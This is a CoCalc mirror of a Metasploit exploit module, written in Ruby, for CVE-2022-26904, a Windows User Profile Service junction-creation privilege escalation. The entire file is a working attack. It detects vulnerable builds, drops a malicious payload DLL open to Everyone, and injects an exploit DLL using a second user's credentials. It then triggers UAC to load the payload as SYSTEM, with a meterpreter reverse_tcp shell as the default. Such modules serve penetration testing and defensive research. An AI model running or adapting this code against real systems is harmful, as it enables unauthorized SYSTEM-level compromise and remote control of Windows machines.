Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
33493 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::FileDropper

11
  include Msf::Post::Windows::FileInfo

12
  include Msf::Post::Windows::Priv

13
  include Msf::Post::Windows::Version

14
  include Msf::Post::Windows::Process

15
  include Msf::Post::Windows::ReflectiveDLLInjection

16
  include Msf::Exploit::EXE # Needed for generate_payload_dll

17
  prepend Msf::Exploit::Remote::AutoCheck

18


19
  def initialize(info = {})

20
    super(

21
      update_info(

22
        info,

23
        {

24
          'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',

25
          'Description' => %q{

26
            The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability

27
            in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of

28
            the junctions it tries to link together.

29


30
            Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a

31
            UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\SYSTEM user.

32


33
            Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as

34
            CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for

35
            CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it

36
            as CVE-2022-26904.

37


38
            It is important to note that the credentials supplied for the second user to log in as in this exploit must be

39
            those of a normal non-admin user and these credentials must also corralate with a user who has already logged in

40
            at least once before. Additionally the current user running the exploit must have UAC set to the highest level,

41
            aka "Always Notify Me When", in order for the code to be executed as NT AUTHORITY\SYSTEM. Note however that

42
            "Always Notify Me When" is the default UAC setting on common Windows installs, so this would only affect instances

43
            where this setting has been changed either manually or as part of the installation process.

44
          },

45
          'License' => MSF_LICENSE,

46
          'Author' => [

47
            'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass

48
            'Grant Willcox' # Metasploit module + Tweaks to PoC

49
          ],

50
          'Platform' => 'win',

51
          'SessionTypes' => [ 'meterpreter' ],

52
          'Targets' => [

53
            [ 'Windows 11', { 'Arch' => ARCH_X64 } ]

54
          ],

55
          'References' => [

56
            ['CVE', '2022-26904'],

57
            ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.

58
            ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post

59
            ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.

60
          ],

61
          'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.

62
          'DefaultTarget' => 0,

63
          'Notes' => {

64
            'Stability' => [ CRASH_SAFE, ],

65
            'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.

66
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]

67
          },

68
          'DefaultOptions' => {

69
            'EXITFUNC' => 'thread',

70
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',

71
            'WfsDelay' => 300

72
          },

73
          'AKA' => [ 'SuperProfile' ]

74
        }

75
      )

76
    )

77


78
    register_options([

79
      OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),

80
      OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),

81
      OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])

82
    ])

83
  end

84


85
  def check

86
    sysinfo_value = sysinfo['OS']

87


88
    if sysinfo_value !~ /windows/i

89
      # Non-Windows systems are definitely not affected.

90
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')

91
    end

92


93
    # see https://docs.microsoft.com/en-us/windows/release-information/

94
    version = get_version_info

95
    unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||

96
           version.build_number == Msf::WindowsVersion::Win11_21H2 ||

97
           version.build_number == Msf::WindowsVersion::Server2022

98
      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')

99
    end

100


101
    print_status('Checking if PromptOnSecureDesktop mitigation applied...')

102
    reg_key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System'

103
    reg_val = 'PromptOnSecureDesktop'

104
    begin

105
      root_key, base_key = @session.sys.registry.splitkey(reg_key)

106
      value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)

107
    rescue Rex::Post::Meterpreter::RequestError => e

108
      return CheckCode::Unknown("Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}")

109
    end

110


111
    if value.data == 0

112
      return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')

113
    elsif value.data == 1

114
      print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')

115
    else

116
      return CheckCode::Unknown("PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?")

117
    end

118


119
    # Build numbers taken from https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904, and associated

120
    # security update information (e.g. https://support.microsoft.com/en-us/topic/windows-10-update-history-857b8ccb-71e4-49e5-b3f6-7073197d98fb,

121
    # https://support.microsoft.com/en-us/topic/windows-11-version-21h2-update-history-a19cd327-b57f-44b9-84e0-26ced7109ba9)

122
    if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.revision_number.between?(0, 612)

123
      return CheckCode::Appears('Vulnerable Windows 11 build detected!')

124
    elsif version.build_number == Msf::WindowsVersion::Server2022 && version.revision_number.between?(0, 642)

125
      return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')

126
    elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.revision_number.between?(0, 1644)

127
      return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')

128
    elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.revision_number.between?(0, 1644)

129
      target_not_presently_supported

130
      return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')

131
    elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.revision_number.between?(0, 1644)

132
      target_not_presently_supported

133
      return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')

134
    elsif version.build_number == Msf::WindowsVersion::Win10_2004

135
      target_not_presently_supported

136
      return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')

137
    elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.revision_number.between?(0, 2211)

138
      target_not_presently_supported

139
      return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')

140
    elsif version.build_number == Msf::WindowsVersion::Win10_1903

141
      target_not_presently_supported

142
      return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')

143
    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.revision_number.between?(0, 2802)

144
      target_not_presently_supported

145
      return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')

146
    elsif version.build_number == Msf::WindowsVersion::Win10_1803

147
      target_not_presently_supported

148
      return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')

149
    elsif version.build_number == Msf::WindowsVersion::Win10_1709

150
      target_not_presently_supported

151
      return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')

152
    elsif version.build_number == Msf::WindowsVersion::Win10_1703

153
      target_not_presently_supported

154
      return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')

155
    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.revision_number.between?(0, 5065)

156
      target_not_presently_supported

157
      return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')

158
    elsif version.build_number == Msf::WindowsVersion::Win10_1511

159
      target_not_presently_supported

160
      return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')

161
    elsif version.build_number == Msf::WindowsVersion::Win10_1507

162
      target_not_presently_supported

163
      return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')

164
    elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2

165
      target_not_presently_supported

166
      return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')

167
    elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012

168
      target_not_presently_supported

169
      return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')

170
    elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2

171
      target_not_presently_supported

172
      return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')

173
    elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update) # Includes Server 2008

174
      target_not_presently_supported

175
      return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')

176
    else

177
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')

178
    end

179
  end

180


181
  def target_not_presently_supported

182
    print_warning('This target is not presently supported by this exploit. Support may be added in the future!')

183
    print_warning('Attempts to exploit this target with this module WILL NOT WORK!')

184
  end

185


186
  def check_target_is_running_supported_windows_version

187
    if !sysinfo['OS'].include?('Windows')

188
      fail_with(Failure::NotVulnerable, 'Target is not running Windows!')

189
    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease

190
      fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')

191
    end

192
  end

193


194
  def exploit

195
    # Step 1: Check target environment is correct.

196
    print_status('Step #1: Checking target environment...')

197
    if is_system?

198
      fail_with(Failure::None, 'Session is already elevated')

199
    end

200
    check_target_is_running_supported_windows_version

201


202
    # Step 2: Generate the malicious DLL and upload it to a temp location.

203
    payload_dll = generate_payload_dll

204
    print_status("Payload DLL is #{payload_dll.length} bytes long")

205
    temp_directory = session.sys.config.getenv('%TEMP%')

206
    malicious_dll_location = "#{temp_directory}\\#{Rex::Text.rand_text_alpha(6..13)}.dll"

207
    print_status("Writing malicious DLL to #{malicious_dll_location}")

208
    write_file(malicious_dll_location, payload_dll)

209


210
    print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')

211
    cmd_exec("icacls #{malicious_dll_location} /grant Everyone:(F)")

212
    register_file_for_cleanup(malicious_dll_location)

213


214
    # Register the directories we create for cleanup

215
    register_dir_for_cleanup('C:\\Windows\\System32\\Narrator.exe.Local')

216
    register_dir_for_cleanup('C:\\Users\\TEMP')

217


218
    # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.

219
    print_status('Step #3: Loading the exploit DLL to run the main exploit...')

220
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')

221
    library_path = ::File.expand_path(library_path)

222


223
    dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s

224


225
    @session_obtained_bool = false

226
    # invoke the exploit, passing in the address of the payload that

227
    # we want invoked on successful exploitation, and the credentials for the second user.

228
    execute_dll(library_path, dll_info_parameter)

229


230
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

231
    print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")

232
    print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')

233
    print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')

234


235
    print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')

236
    print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')

237
    sleep(60)

238
    if (@session_obtained_bool == false)

239
      # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself

240
      # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.

241
      begin

242
        cmd_exec('UserAccountControlSettings.exe')

243
      rescue Rex::TimeoutError

244
        print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')

245
      end

246
    end

247
  end

248


249
  def on_new_session(new_session)

250
    @session_obtained_bool = true

251
    old_session = @session

252
    @session = new_session

253
    if new_session.type == 'meterpreter'

254
      consent_pids = pidof('consent.exe')

255
      for id in consent_pids

256
        @session.sys.process.kill(id)

257
      end

258
      sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes

259
      # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.

260
      narrator_pids = pidof('Narrator.exe')

261
      for id in narrator_pids

262
        @session.sys.process.kill(id)

263
      end

264
      narrator_pids = pidof('NarratorQuickStart.exe')

265
      for id in narrator_pids

266
        @session.sys.process.kill(id)

267
      end

268
      narrator_pids = pidof('msiexec.exe')

269
      for id in narrator_pids

270
        @session.sys.process.kill(id)

271
      end

272
    else

273
      # If it is another session type such as shell or PowerShell we will need to execute the command

274
      # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes

275
      # by name or PIDs as library functions for these session types.

276
      cmd_exec('taskkill /IM "consent.exe" /F')

277
      sleep(5)

278
      cmd_exec('taskkill /IM "narrator.exe" /F')

279
      cmd_exec('taskkill /IM "narratorquickstart.exe" /F')

280
      cmd_exec('taskkill /IM "msiexec.exe" /F')

281
    end

282


283
    rm_rf('C:\\Windows\\System32\\Narrator.exe.local')

284
    for _i in range(1..3)

285
      rm_rf('C:\\Users\\TEMP') # Try deleting this 3 times just to be sure.

286
    end

287
    @session = old_session

288
    super

289
  end

290
end

291


292